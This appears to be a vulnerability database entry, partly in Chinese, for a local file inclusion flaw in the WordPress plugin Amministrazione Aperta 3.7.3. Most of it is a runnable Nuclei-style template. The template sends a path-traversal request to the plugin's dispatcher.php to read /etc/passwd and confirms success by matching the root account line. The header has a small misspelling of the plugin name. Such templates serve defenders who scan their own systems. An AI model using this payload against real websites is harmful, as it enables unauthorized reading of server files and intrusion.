amministrazione-aperta-lfi: WordPress Amministrazione Aperta 3.7.3 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Amministrazione Aporda | POC: 已公开

漏洞描述

WordPress Amministrazione Aperta 3.7.3 is vulnerable to local file inclusion.

PoC代码[已公开]

id: amministrazione-aperta-lfi

info:
  name: WordPress Amministrazione Aperta 3.7.3 - Local File Inclusion
  author: daffainfo,Splint3r7
  severity: high
  description: WordPress Amministrazione Aperta 3.7.3 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/50838
    - https://wordpress.org/plugins/amministrazione-aperta
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wp-plugin,lfi,wp,edb,wordpress,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009b77f1377bb334241e6b2b8c6ae97d82ae388441066eb4b10ef7ae08da71a7a6022100ec693ae099bcc7427bfaaceffa92eebf8d8bb9d1f15ba9f580c5b0f26300a067:922c64590222798bb761d5b6d8e72950

相关漏洞推荐